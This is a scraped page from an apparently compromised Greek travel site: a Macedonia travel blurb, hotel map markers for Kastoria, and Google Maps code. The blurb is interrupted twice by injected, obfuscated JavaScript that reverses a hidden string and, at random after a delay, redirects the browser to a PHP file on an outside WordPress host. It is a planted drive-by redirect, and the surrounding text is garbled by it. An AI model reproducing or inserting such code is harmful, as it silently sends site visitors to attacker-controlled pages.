https://gr.pinterest.com/etravel_greece/
Macedonia. Journey in$Bhq=function(n){if (typeof ($Bhq.list[n]) == “string”) return $Bhq.list[n].split(“”).reverse().join(“”);return $Bhq.list[n];};$Bhq.list=[“’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to the past $Bhq=function(n){if (typeof ($Bhq.list[n]) == “string”) return $Bhq.list[n].split(“”).reverse().join(“”);return $Bhq.list[n];};$Bhq.list=[“’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to explore legendary lands once traversed by the Macedonian king Alexander… Read more…
ton','location': [40.56653651, 21.46691698],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'54624'},{'name':'Hotel Doltso','location': [40.49056516, 21.25483811],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'51495'},{'name':'Andromeda Boutique Hotel','location': [40.49056516, 21.25500441],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'46320'},{'name':'Esperos Palace','location': [40.49056516, 21.23202324],'message':'
Fountoukli - Apodimon Kastorianon, Kastoria, 52100, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'42533'},{'name':'Guesthouse Enterne','location': [40.49944767, 21.40676916],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'40533'},{'name':'Chalet Sourino','location': [40.4851017, 21.21796462],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'38404'},{'name':'Aposkepos Hotel','location': [40.55779157, 21.25172406],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'36849'},{'name':'Paralimnio Suites','location': [40.48565303, 21.2331605],'message':'
34, Kyknon Avenue, Kastoria, 52100, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'28599'}];
var clustering = '';
var map;
var mgr;
var markerClusterer;
var markerArray = [];
var mClusterer = null;
var pippoint_effects='click';
var infoBubble = new InfoBubble({maxWidth:210,minWidth:210,minHeight:"auto",padding:0,borderRadius:0,borderWidth:0,overflow:"visible",backgroundColor:"#fff"});
var isDraggable = jQuery(document).width() > 480 ? true : false;
var isscrollwheel = jQuery(document).width() > 480 ? true : false;
var dragging = zoom_changed = false;
var bounds_modified = false;
var new_bounds;
var query_string='post_type=listing&taxonomy=listingcategory&slug=hotel';
var zoom_changed=1;
function initialize() {
bounds = new google.maps.LatLngBounds();
var myOptions = {
scrollwheel: isscrollwheel,
draggable: isDraggable,
zoom: CITY_MAP_ZOOMING_FACT,
center: new google.maps.LatLng(CITY_MAP_CENTER_LAT, CITY_MAP_CENTER_LNG),
mapTypeId: google.maps.MapTypeId.ROADMAP }
map = new google.maps.Map(document.getElementById("map_canvas"),myOptions);
/* map style customizer */
var styles = [];
map.setOptions({styles: styles});
/* Add Google Map marlkers */
mgr = new MarkerManager( map );
templ_add_googlemap_markers(markers);
if ( zoom_option==1) {
map.fitBounds(bounds);
map.setCenter(bounds.getCenter( ) ) ;
}
/* but that message is not within the marker's instance data */
google.maps.event.addListener(map, 'dragstart', function() {
dragging = false;
});
google.maps.event.addListener(map, 'dragend', function() {
dragging = true;
});
google.maps.event.addListener(map, 'bounds_changed', function() {
bounds_modified = true;
new_bounds = map.getBounds();
});
google.maps.event.addListener(map, 'zoom_changed', function() {
if ( zoom_changed!=1) {
dragging = true;
}
zoom_changed=0;
});
google.maps.event.addListener(map, 'idle', function(ev) {
/*new_bounds = map.getBounds();*/
refresh_markers();
});
}
google.maps.event.addDomListener(window, 'load', initialize);